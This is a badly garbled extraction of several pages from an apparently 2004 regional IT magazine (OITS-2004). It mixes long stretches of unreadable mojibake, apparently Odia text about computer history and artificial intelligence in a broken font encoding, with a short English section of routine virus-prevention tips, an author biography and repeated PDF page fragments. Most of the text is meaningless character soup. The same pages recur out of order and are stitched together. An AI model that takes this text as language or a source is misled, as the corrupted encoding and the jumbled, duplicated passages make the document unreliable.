c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 44: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 45: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn 